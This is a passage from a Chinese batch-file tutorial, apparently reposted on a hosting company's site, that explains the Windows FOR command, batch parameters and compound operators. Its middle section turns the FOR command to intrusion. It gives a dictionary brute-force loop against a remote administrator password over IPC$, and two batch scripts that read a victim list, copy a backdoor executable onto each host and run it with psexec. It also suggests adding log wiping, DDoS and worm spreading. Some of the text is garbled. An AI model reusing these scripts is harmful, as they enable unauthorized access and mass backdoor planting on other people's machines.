|
法是,用單引號將括號之間的 filenameset 括起來�。
這樣,該字符串會被當(dāng)作一個文件中的一個單一輸入行����。
最后,您可以用 FOR /F 命令來分析命令的輸出����。方法是,將括號之間的 filenameset 變成一個反括字符
串���。該字符串會被當(dāng)作命令行�,傳遞到一個子 CMD.EXE����,其輸出會被抓進(jìn)內(nèi)存,并被當(dāng)作文件分析��。因此
���,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
會枚舉當(dāng)前環(huán)境中的環(huán)境變量名稱�����。
另外���,F(xiàn)OR 變量參照的替換已被增強(qiáng)。您現(xiàn)在可以使用下列選項語法:
~I - 刪除任何引號(")�,擴(kuò)充 %I
%~fI - 將 %I 擴(kuò)充到一個完全合格的路徑名
%~dI - 僅將 %I 擴(kuò)充到一個驅(qū)動器號
%~pI - 僅將 %I 擴(kuò)充到一個路徑
%~nI - 僅將 %I 擴(kuò)充到一個文件名
%~xI - 僅將 %I 擴(kuò)充到一個文件擴(kuò)展名
%~sI - 擴(kuò)充的路徑只含有短名
%~aI - 將 %I 擴(kuò)充到文件的文件屬性
%~tI - 將 %I 擴(kuò)充到文件的日期/時間
%~zI - 將 %I 擴(kuò)充到文件的大小
%~$PATH:I - 查找列在路徑環(huán)境變量的目錄,并將 %I 擴(kuò)充到找到的第一個完全合格的名稱���。如果環(huán)境變
量未被定義���,或者沒有找到文件,此組合鍵會擴(kuò)充空字符串
可以組合修飾符來得到多重結(jié)果:
%~dpI - 僅將 %I 擴(kuò)充到一個驅(qū)動器號和路徑
%~nxI - 僅將 %I 擴(kuò)充到一個文件名和擴(kuò)展名
%~fsI - 僅將 %I 擴(kuò)充到一個帶有短名的完整路徑名
%~dp$PATH:i - 查找列在路徑環(huán)境變量的目錄����,并將 %I 擴(kuò)充到找到的第一個驅(qū)動器號和路徑����。
%~ftzaI - 將 %I 擴(kuò)充到類似輸出線路的 DIR
在以上例子中��,%I 和 PATH 可用其他有效數(shù)值代替��。%~ 語法用一個有效的 FOR 變量名終止���。選取類似
%I 的大寫變量名比較易讀�����,而且避免與不分大小寫的組合鍵混淆���。
以上是MS的官方幫助,下面我們舉幾個例子來具體說明一下For命令在入侵中的用途����。
sample2:
利用For命令來實現(xiàn)對一臺目標(biāo)Win2k主機(jī)的暴力密碼破解。
我們用net use \\ip\ipc$ "password" /u:"administrator"來嘗試這和目標(biāo)主機(jī)進(jìn)行連接���,當(dāng)成功時記下
密碼��。
最主要的命令是一條:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%來表示admin的密碼��,在dict.txt中這個取i%的值用net use 命令來連接��。然后將程序運(yùn)行結(jié)果傳遞給
find命令--
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"│find ":命令成功完
成">>D:\ok.txt ��,這樣就ko了�����。
sample3:
你有沒有過手里有大量肉雞等著你去種后門+木馬呢�����?����,當(dāng)數(shù)量特別多的時候���,原本很開心的一件事都會
變得很郁悶:)��。文章開頭就談到使用批處理文件����,可以簡化日常或重復(fù)性任務(wù)��。那么如何實現(xiàn)呢�?呵呵
,看下去你就會明白了��。
主要命令也只有一條:(在批處理文件中使用 FOR 命令時����,指定變量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1,在這里它表示按順序?qū)ictim.txt中的內(nèi)容傳遞給door.bat中的參數(shù)
%i %j %k�����。
而cultivate.bat無非就是用net use命令來建立IPC$連接��,并copy木馬+后門到victim���,然后用返回碼
(If errorlever =)來篩選成功種植后門的主機(jī)��,并echo出來�,或者echo到指定的文件�����。
delims= 表示vivtim.txt中的內(nèi)容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內(nèi)容
是什么樣的了�����。應(yīng)該根據(jù)%%i %%j %%k表示的對象來排列����,一般就是 ip password username。
代碼雛形:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
------------------- cut here then save as a batchfile(I call it door.bat) ------------------
-----------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3
>>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------
------------
這只是一個自動種植后門批處理的雛形����,兩個批處理和后門程序(Windrv32.exe),PSexec.exe需放在統(tǒng)一
目錄下.批處理內(nèi)容
尚可擴(kuò)展,例如:加入清除日志+DDOS的功能,加入定時添加用戶的功能,更深入一點(diǎn)可以使之具備自動傳播功
能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.
二.如何在批處理文件中使用參數(shù)
批處理中可以使用參數(shù)����,一般從1%到 9%這九個,當(dāng)有多個參數(shù)時需要用shift來移動����,這種情況并不多見
,我們就不考慮它了����。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
這個例子用于連續(xù)地格式化幾張軟盤,所以用的時候需在dos窗口輸入fomat.bat a�����,呵呵,好像有點(diǎn)畫蛇添
足了~
sample2:
當(dāng)我們要建立一個IPC$連接地時候總要輸入一大串命令,弄不好就打錯了��,所以我們不如把一些固定命令
寫入一個批處理���,把肉雞地ip password username 當(dāng)著參數(shù)來賦給這個批處理����,這樣就不用每次都打命令
了�����。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦�����,這里PASSWORD是第二個參數(shù)�。
@if errorlevel 1 echo connection failed
怎么樣,使用參數(shù)還是比較簡單的吧?你這么帥一定學(xué)會了.No.3
三.如何使用組合命令(Compound Command)
1.&
Usage:第一條命令 & 第二條命令 [& 第三條命令...]
用這種方法可以同時執(zhí)行多條命令��,而不管命令是否執(zhí)行成功
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage:第一條命令 && 第二條命令 [&& 第三條命令...]
用這種方法可以同時執(zhí)行多條命令�,當(dāng)碰到執(zhí)行出錯的命令后將不執(zhí)行后面的命令,如果一直沒有出錯則
一直執(zhí)行完所有命令;
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
在做備份的時候可能會用到這種命令會比較簡單�����,如:
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb
E:\backup
如果遠(yuǎn)程服務(wù)器上存在backup.mdb文件��,就執(zhí)行copy命令���,若不存在該文件則不執(zhí)行copy命令�����。這種用法
可以替換IF exist了.
3.││
Usage:第一條命令 ││ 第二條命令 [││ 第三條命令...]
用這種方法可以同時執(zhí)行多條命令��,當(dāng)碰到執(zhí)行正確的命令后將不執(zhí)行后面的命令,如果沒有出現(xiàn)正確的
命令則一直執(zhí)行完所有命令��;
Sample:
C:\Ex4rch>dir sometips.gif ││ del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
組合命令使用的例子:
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
服務(wù)器租用/服務(wù)器托管中國五強(qiáng)���!虛擬主機(jī)域名注冊頂級提供商�!15年品質(zhì)保障���!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
0371-60135900
